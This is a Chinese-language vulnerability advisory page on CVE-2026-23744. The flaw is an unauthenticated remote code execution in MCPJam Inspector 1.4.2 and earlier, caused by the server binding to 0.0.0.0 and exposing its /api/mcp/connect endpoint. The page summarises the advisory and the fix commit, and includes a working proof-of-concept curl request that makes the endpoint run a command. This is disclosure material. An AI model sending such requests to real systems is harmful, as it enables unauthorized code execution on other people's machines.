# MCPJam Inspector HTTP端点暴露漏洞
## 概述
MCPJam inspector 是一个用于 MCP 服务器的本地优先开发平台。版本 1.4.2 及更早版本存在远程代码执行(RCE)漏洞,攻击者可通过构造 HTTP 请求触发 MCP 服务器安装流程,从而实现远程代码执行。
## 影响版本
1.4.2 及更早版本
## 细节
MCPJam inspector 默认监听 0.0.0.0,而非仅限本地的 127.0.0.1。该配置使得攻击者可通过网络远程发送特制 HTTP 请求,触发漏洞并导致恶意 MCP 服务器的安装,最终实现远程代码执行。
## 影响
未经身份验证的远程攻击者可利用该漏洞在受影响系统上执行任意代码。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: REC in MCPJam inspector due to HTTP Endpoint exposes · Advisory · MCPJam/inspector · GitHub -- 🔗来源链接
标签:x_refsource_CONFIRM
神龙速读:
### 关键漏洞信息
- **漏洞类型**: Remote Code Execution (RCE)
- **受影响版本**: `<= 1.4.2`
- **修复版本**: 无修复版本
- **CVE ID**: CVE-2026-23744
- **严重性评分**: 9.8
- **CVSS v3.0 基础指标**:
- 攻击向量: 网络
- 攻击复杂度: 低
- 所需权限: 无
- 用户交互: 无
- **漏洞描述**:
- 由于MCPJam Inspector HTTP接口暴露,导致远程代码执行漏洞。
- 此漏洞比CVE-2025-49596更严重,无需用户交互即可被利用。
- **技术细节**:
- MCPJam Inspector绑定到`0.0.0.0`,使HTTP API可以远程访问。
- `/api/mcp/connect` API成为未授权请求的开放入口点,系统在无安全检查的情况下执行`command`和`args`字段,导致任意命令执行。
- **POC**:
- 启动MCPJam Inspector,发送HTTP请求到目标主机可触发RCE。
- 示例HTTP请求:
```bash
curl http://<IP>:<PORT>/api/mcp/connect \
--header "Content-Type: application/json" \
--data '{"serverConfig":{"command":"cmd.exe","args":["/c","calc"]}}'
```
- **影响**:
- 可能导致远程代码执行,威胁系统安全。
标题: Fix port vuln (#1152) · MCPJam/inspector@e6b9cf9 · GitHub -- 🔗来源链接
标签:x_refsource_MISC
神龙速读:
- **Commit Message**: Fix port vuln (#1152)
- **File Changed**: server/index.ts
- **Vulnerability Addressed**: Binding to `0.0.0.0` exposes the server to all network interfaces, which could lead to unauthorized access from external sources.
- **Code Change**: Changed the server's host binding from `0.0.0.0` to `127.0.0.1` to restrict access to the localhost only.
暂无评论